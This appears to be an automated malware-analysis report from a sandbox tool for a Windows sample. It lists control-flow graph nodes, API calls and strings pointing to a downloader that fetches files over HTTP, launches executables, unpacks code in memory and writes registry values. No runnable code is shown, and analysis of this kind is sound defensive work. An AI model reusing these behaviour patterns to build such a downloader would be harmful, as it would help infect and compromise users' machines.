call 402200 273->327 418 405c72-405c9d call 406a00 call 4081b0 call 4022d0 call 408260 call 402200 274->418 419 405c55 call 406980 274->419 373 405dca-405e67 call 406f30 call 408190 call 4022d0 call 402250 call 402200 call 406fb0 call 408170 call 4022d0 call 402250 call 402200 call 407030 call 408130 call 4022d0 call 402250 call 402200 call 4070b0 call 408230 call 4022d0 call 408260 call 402200 326->373 374 405eae-405ed9 call 4072d0 call 408100 call 4022d0 call 408260 call 402200 326->374 494 405d54-405d59 call 406d20 327->494 495 405d5e-405d89 call 406da0 call 4081b0 call 4022d0 call 408260 call 402200 327->495 630 406280-406299 call 4021f0 call 402070 344->630 627 405e73-405e9e call 4071c0 call 408230 call 4022d0 call 408260 call 402200 373->627 628 405e69-405e6e call 407140 373->628 432 405f59-405f84 call 4074f0 call 4081b0 call 4022d0 call 408260 call 402200 374->432 433 405edb-405f54 call 407360 call 408170 call 4022d0 call 402250 call 402200 call 4073e0 call 4081b0 call 4022d0 call 402250 call 402200 call 407470 call 408130 call 4022d0 call 402250 call 402200 374->433 418->344 497 405ca3-405ca8 call 406a90 418->497 431 405c5a-405c6d call 408190 call 4022d0 419->431 469 406115-40611e call 402250 call 402200 431->469 506 406004-40602f call 407700 call 408200 call 4022d0 call 408260 call 402200 432->506 507 405f86-405fff call 407580 call 408170 call 4022d0 call 402250 call 402200 call 407600 call 408190 call 4022d0 call 402250 call 402200 call 407680 call 408130 call 4022d0 call 402250 call 402200 432->507 433->344 469->344 494->431 495->344 563 405d8f-405d94 call 406e30 495->563 497->431 579 406031-406082 call 407790 call 408170 call 4022d0 call 402250 call 402200 call 407810 call 408130 call 4022d0 call 402250 call 402200 call 407890 506->579 580 406084-4060af call 407910 call 408130 call 4022d0 call 408260 call 402200 506->580 507->344 563->326 702 406102-406112 call 408130 call 4022d0 579->702 580->344 642 4060b1-4060fd call 407990 call 408170 call 4022d0 call 402250 call 402200 call 407a10 call 408190 call 4022d0 call 402250 call 402200 call 407a90 580->642 627->344 687 405ea4-405ea9 call 407250 627->687 628->627 658 4062d9-4062e0 Sleep 630->658 659 40629b-4062be call 4020b0 call 4022d0 call 4025c0 630->659 642->702 658->630 694 4062c0-4062cf call 4025c0 659->694 695 4062e2-406341 call 402200 call 408490 * 3 call 404ac0 659->695 687->374 694->695 705 4062d1-4062d4 call 402200 694->705 728 406343-406352 call 408490 call 403940 695->728 729 40635a-406385 call 407cc0 call 408200 call 4022d0 call 408260 call 402200 695->729 702->469 705->658 736 406357 728->736 744 406420-406451 call 407e30 call 4081b0 call 4022d0 call 408260 call 402200 729->744 745 40638b-4063bb call 4016b0 call 407d50 call 4080b0 call 4022d0 729->745 736->729 766 406453-4064b8 call 407fa0 call 408190 call 4022d0 call 407f20 call 408190 call 4022d0 call 407ec0 call 408090 call 4022d0 call 405460 744->766 767 4064bb-4064c0 call 4037d0 744->767 763 4063c0-4063d6 call 4021f0 call 402070 745->763 776 4063e7-406404 call 4020b0 call 4022d0 call 402200 763->776 777 4063d8-4063e3 Sleep 763->777 766->767 783 406409-40641b call 402200 call 401710 776->783 777->763 779 4063e5 777->779 779->783 783->744
                                                    APIs
                                                    • Sleep.KERNEL32(000005DC,?,7732D120), ref: 00405620
                                                    • __Init_thread_footer.LIBCMT ref: 00405847
                                                    • Sleep.KERNEL32(00000BB8,00000000,?,0042B77C,0042B92C,0042B92D,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 00405A4A
                                                      • Part of subcall function 00406550: __Init_thread_footer.LIBCMT ref: 004065B9
                                                      • Part of subcall function 004065E0: __Init_thread_footer.LIBCMT ref: 0040663A
                                                      • Part of subcall function 00407C30: __Init_thread_footer.LIBCMT ref: 00407C99
                                                      • Part of subcall function 00407BB0: __Init_thread_footer.LIBCMT ref: 00407C09
                                                      • Part of subcall function 00407B10: __Init_thread_footer.LIBCMT ref: 00407B8D
                                                    • Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,004272E8,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 004062DE
                                                    • Sleep.KERNEL32(00000BB8,00000000,00000000,004272E8), ref: 004063DD
                                                      • Part of subcall function 00407FA0: __Init_thread_footer.LIBCMT ref: 00407FF9
                                                      • Part of subcall function 00407F20: __Init_thread_footer.LIBCMT ref: 00407F79
                                                      • Part of subcall function 00407EC0: __Init_thread_footer.LIBCMT ref: 00407F11
                                                      • Part of subcall function 004055C0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405493
                                                      • Part of subcall function 004055C0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004054B5
                                                      • Part of subcall function 004055C0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004054DD
                                                      • Part of subcall function 004055C0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054E6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$Sleep$CloseCreateOpenValue
                                                    • String ID: DFEK$KDOX$Q)9$SUB=$]DFE$^OX*$get$mixone$updateSW$viFO
                                                    • API String ID: 2078494684-1136066708
                                                    • Opcode ID: 3370340bea71cbf09f401ea1be89ae1aa616e8b686eb8a3d9626f30ac681365a
                                                    • Instruction ID: f649a411d8851b1a91c0a488fce11130e3673d7bad0c40fe0d5f826dd2b8960c
                                                    • Opcode Fuzzy Hash: 3370340bea71cbf09f401ea1be89ae1aa616e8b686eb8a3d9626f30ac681365a
                                                    • Instruction Fuzzy Hash: 3F82AF71D001049ADB14FBB5C95ABEEB3789F14308F5081BEF412771D2EF786A49CAA9

                                                    Control-flow Graph

                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                    • __cftof.LIBCMT ref: 10001624
                                                    • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                    • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                    • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                    • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                    • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                    • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                    • String ID: GET$http://
                                                    • API String ID: 1233269984-1632879366
                                                    • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                    • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                    • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                    • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

                                                    Control-flow Graph

                                                    APIs
                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017B7
                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017DD
                                                      • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 004025A3
                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401803
                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401829
                                                    Strings
                                                    • GET, xrefs: 00401F81
                                                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401807
                                                    • text, xrefs: 00401B5C
                                                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017E1
                                                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401779
                                                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004017BB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
                                                    • API String ID: 2146599340-3782612381
                                                    • Opcode ID: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                    • Instruction ID: 9ba0ec624b0ce2a87a65cb7bdca14d25b7083be08071b54b776f69b68f7f070f
                                                    • Opcode Fuzzy Hash: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                    • Instruction Fuzzy Hash: 34316171E00108EBDB14DFA9DC85FEEBBB9EB48714F60812AE121771C0C778A644CBA5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 942 4b4003c-4b40047 943 4b4004c-4b40263 call 4b40a3f call 4b40e0f call 4b40d90 VirtualAlloc 942->943 944 4b40049 942->944 959 4b40265-4b40289 call 4b40a69 943->959 960 4b4028b-4b40292 943->960 944->943 965 4b402ce-4b403c2 VirtualProtect call 4b40cce call 4b40ce7 959->965 962 4b402a1-4b402b0 960->962 964 4b402b2-4b402cc 962->964 962->965 964->962 971 4b403d1-4b403e0 965->971 972 4b403e2-4b40437 call 4b40ce7 971->972 973 4b40439-4b404b8 VirtualFree 971->973 972->971 975 4b405f4-4b405fe 973->975 976 4b404be-4b404cd 973->976 979 4b40604-4b4060d 975->979 980 4b4077f-4b40789 975->980 978 4b404d3-4b404dd 976->978 978->975 984 4b404e3-4b40505 LoadLibraryA 978->984 979->980 985 4b40613-4b40637 979->985 982 4b407a6-4b407b0 980->982 983 4b4078b-4b407a3 980->983 986 4b407b6-4b407cb 982->986 987 4b4086e-4b408be LoadLibraryA 982->987 983->982 988 4b40517-4b40520 984->988 989 4b40507-4b40515 984->989 990 4b4063e-4b40648 985->990 991 4b407d2-4b407d5 986->991 994 4b408c7-4b408f9 987->994 992 4b40526-4b40547 988->992 989->992 990->980 993 4b4064e-4b4065a 990->993 995 4b40824-4b40833 991->995 996 4b407d7-4b407e0 991->996 997 4b4054d-4b40550 992->997 993->980 998 4b40660-4b4066a 993->998 1001 4b40902-4b4091d 994->1001 1002 4b408fb-4b40901 994->1002 1000 4b40839-4b4083c 995->1000 1003 4b407e4-4b40822 996->1003 1004 4b407e2 996->1004 1005 4b40556-4b4056b 997->1005 1006 4b405e0-4b405ef 997->1006 999 4b4067a-4b40689 998->999 1009 4b40750-4b4077a 999->1009 1010 4b4068f-4b406b2 999->1010 1000->987 1011 4b4083e-4b40847 1000->1011 1002->1001 1003->991 1004->995 1007 4b4056d 1005->1007 1008 4b4056f-4b4057a 1005->1008 1006->978 1007->1006 1012 4b4057c-4b40599 1008->1012 1013 4b4059b-4b405bb 1008->1013 1009->990 1014 4b406b4-4b406ed 1010->1014 1015 4b406ef-4b406fc 1010->1015 1016 4b40849 1011->1016 1017 4b4084b-4b4086c 1011->1017 1025 4b405bd-4b405db 1012->1025 1013->1025 1014->1015 1019 4b406fe-4b40748 1015->1019 1020 4b4074b 1015->1020 1016->987 1017->1000 1019->1020 1020->999 1025->997
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B4024D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: cess$kernel32.dll
                                                    • API String ID: 4275171209-1230238691
                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction ID: aaf139267ef4e5642fbb18c39f388347c894ce93ea4240f5c082b251081cc81f
                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction Fuzzy Hash: EB527974A01229DFDB64CF68C984BACBBB1BF49304F1480D9E94DAB351DB30AA85DF15

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1082 10001175-100011a6 call 1000e8e7 1085 100011a8-100011b0 call 1000270d 1082->1085 1086 100011bf 1082->1086 1089 100011b5-100011bd 1085->1089 1088 100011c5-100011dd InternetSetFilePointer 1086->1088 1090 100011e3-1000121b InternetReadFile 1088->1090 1089->1088 1091 10001253-1000125a 1090->1091 1092 1000121d-1000124d call 1000270d call 100050e0 call 10002724 1090->1092 1093 10001260-100012a0 call 10003c40 HttpQueryInfoA 1091->1093 1094 1000125c-1000125e 1091->1094 1092->1091 1100 100012a6-100012d2 CoCreateInstance 1093->1100 1101 1000150a-10001520 call 1000e8a5 1093->1101 1094->1090 1094->1093 1100->1101 1103 100012d8-100012df 1100->1103 1103->1101 1107 100012e5-10001316 call 1000184b call 10001006 1103->1107 1113 10001318 1107->1113 1114 1000131a-10001351 call 10001c08 call 10001bb9 1107->1114 1113->1114 1120 10001357-1000135e 1114->1120 1121 100014fe-10001505 1114->1121 1120->1121 1122 10001364-100013cc call 1000270d 1120->1122 1121->1101 1126 100013d2-100013e8 1122->1126 1127 100014e6-100014f9 call 10002724 1122->1127 1129 10001486-10001497 1126->1129 1130 100013ee-1000141d call 1000270d 1126->1130 1127->1121 1131 10001499-1000149b 1129->1131 1132 100014dc-100014e4 1129->1132 1141 1000146e-10001483 call 10002724 1130->1141 1142 1000141f-10001421 1130->1142 1135 100014aa-100014ac 1131->1135 1136 1000149d-100014a8 call 10005926 1131->1136 1132->1127 1139 100014c0-100014d1 call 10003c40 call 10005926 1135->1139 1140 100014ae-100014be call 100050e0 1135->1140 1152 100014d7 call 1000584c 1136->1152 1139->1152 1140->1132 1141->1129 1143 10001423-10001425 1142->1143 1144 10001434-10001447 call 10003c40 1142->1144 1143->1144 1149 10001427-10001432 call 100050e0 1143->1149 1161 10001456-1000145c 1144->1161 1162 10001449-10001454 call 10005926 1144->1162 1149->1141 1152->1132 1161->1141 1164 1000145e-10001463 call 10005926 1161->1164 1167 10001469 call 1000584c 1162->1167 1164->1167 1167->1141
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                    • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                    • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                    • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                    • String ID: text
                                                    • API String ID: 1154000607-999008199
                                                    • Opcode ID: 5bb6c959c08c52f1deca969ff5d7f0342f658ad243dbff8a6426dbc5f8fc3103
                                                    • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                    • Opcode Fuzzy Hash: 5bb6c959c08c52f1deca969ff5d7f0342f658ad243dbff8a6426dbc5f8fc3103
                                                    • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                      • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: .exe$open
                                                    • API String ID: 1627157292-49952409
                                                    • Opcode ID: fecaffcc8a5dd3a535f99b20f533ad3ad145e7b685b1384be33c82bc1a84d92d
                                                    • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                    • Opcode Fuzzy Hash: fecaffcc8a5dd3a535f99b20f533ad3ad145e7b685b1384be33c82bc1a84d92d
                                                    • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1237 401d60-401dae 1238 401db2-401db7 1237->1238 1238->1238 1239 401db9-402013 call 402470 call 402650 call 402470 call 40a3e0 call 40c34c InternetOpenA 1238->1239 1254 402015-402021 1239->1254 1255 40203d-40205a call 408ec2 1239->1255 1257 402033-40203a call 409027 1254->1257 1258 402023-402031 1254->1258 1257->1255 1258->1257 1260 402062-402099 call 40c26f call 401d60 1258->1260
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: http://
                                                    • API String ID: 0-1121587658
                                                    • Opcode ID: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                    • Instruction ID: beb1f9afae3dc46702148b7d116b1b3e2c798cd3d3ea86b197954d74152ad0ce
                                                    • Opcode Fuzzy Hash: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                    • Instruction Fuzzy Hash: F451C371E002099FDB14CFA8C885BEEBBB5EF48314F20812EE915B72C1D7799945CBA4

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1268 99cd47-99cd76 1270 99cd78-99cd93 RegOpenKeyA 1268->1270 1271 99cd9f-99cdba RegOpenKeyA 1268->1271 1270->1271 1274 99cd95 1270->1274 1272 99cdbc-99cdc6 1271->1272 1273 99cdd2-99cdfe 1271->1273 1272->1273 1277 99ce0b-99ce15 1273->1277 1278 99ce00-99ce09 GetNativeSystemInfo 1273->1278 1274->1271 1279 99ce21-99ce2f 1277->1279 1280 99ce17 1277->1280 1278->1277 1282 99ce3b-99ce42 1279->1282 1283 99ce31 1279->1283 1280->1279 1284 99ce48-99ce4f 1282->1284 1285 99ce55 1282->1285 1283->1282 1284->1285
                                                    APIs
                                                    • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0099CD8B
                                                    • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 0099CDB2
                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 0099CE09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000998000.00000040.00000001.01000000.00000003.sdmp, Offset: 00998000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_998000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Open$InfoNativeSystem
                                                    • String ID:
                                                    • API String ID: 1247124224-0
                                                    • Opcode ID: eca3a003ee27186f9b2c1cc7a45abf07b1ddf1f1115ab9b4cb8bdf9d608af222
                                                    • Instruction ID: b0219bd2726bda7c04632a980d4bb5fa1243ecf723514d56e77e921b98ebc9af
                                                    • Opcode Fuzzy Hash: eca3a003ee27186f9b2c1cc7a45abf07b1ddf1f1115ab9b4cb8bdf9d608af222
                                                    • Instruction Fuzzy Hash: D721E7B150418EAFDF12DF64C948BEF3BA9EF05305F100426E9428AD90EB765DA4CF68

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1286 4020c0-4020db 1287 40213b-40214c call 408ec2 1286->1287 1288 4020dd-4020e1 1286->1288 1288->1287 1290 4020e3-402101 CreateFileA 1288->1290 1290->1287 1291 402103-402130 WriteFile CloseHandle call 408ec2 1290->1291 1294 402135-402138 1291->1294
                                                    APIs
                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020F6
                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402117
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040211E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleWrite
                                                    • String ID:
                                                    • API String ID: 1065093856-0
                                                    • Opcode ID: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                    • Instruction ID: 54406537bc71ee86772d4e0f102f4040d02d69394e2def86726d8d124470bd26
                                                    • Opcode Fuzzy Hash: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                    • Instruction Fuzzy Hash: 4401D671610204ABD720DF68DD49FEEB7A8EB48725F00053EFA45AA2D0DAB46945C758
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000400,?,?,04B40223,?,?), ref: 04B40E19
                                                    • SetErrorMode.KERNEL32(00000000,?,?,04B40223,?,?), ref: 04B40E1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction ID: f91484002589e88e4a4d3f6ea8ab43fed4857b487d85ba7f5556b63228273427
                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction Fuzzy Hash: 0BD0123154512877D7003A94DC09BCD7B1CDF09B62F008451FB0DD9080C770964046E6
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a9a000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 4a04f0fa4f3bd5c79ad91900929f012e460dca994b15493878c4e414ebe116b3
                                                    • Instruction ID: 238103499dce263cdfef9c96157852f8f8263a942b41da82cf5a09aa355b5b1f
                                                    • Opcode Fuzzy Hash: 4a04f0fa4f3bd5c79ad91900929f012e460dca994b15493878c4e414ebe116b3
                                                    • Instruction Fuzzy Hash: 791144B260125B9FCB02DF30C8457DE3BA1EF61311F15802AE9808BE52DA265C21CBDA
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                    • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                    • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                    • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                    • Instruction ID: ad8272dea5af250e00f6a395d7f300feb0e2b911a381963764dc482fc342fffd
                                                    • Opcode Fuzzy Hash: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                    • Instruction Fuzzy Hash: B4E03031205225AAD73126A69E00BDB3A589B417A4F154233EC04E66D1DBAC9CE182AD
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000998000.00000040.00000001.01000000.00000003.sdmp, Offset: 00998000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_998000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 55ac00a8b322077b20a80045003d75cf766b398437384f5425b7f09681cf5447
                                                    • Instruction ID: ca48ff0c3c765cb34c8e9d16a158c4f18fe9c3d08370c6489bac0c260c3eff79
                                                    • Opcode Fuzzy Hash: 55ac00a8b322077b20a80045003d75cf766b398437384f5425b7f09681cf5447
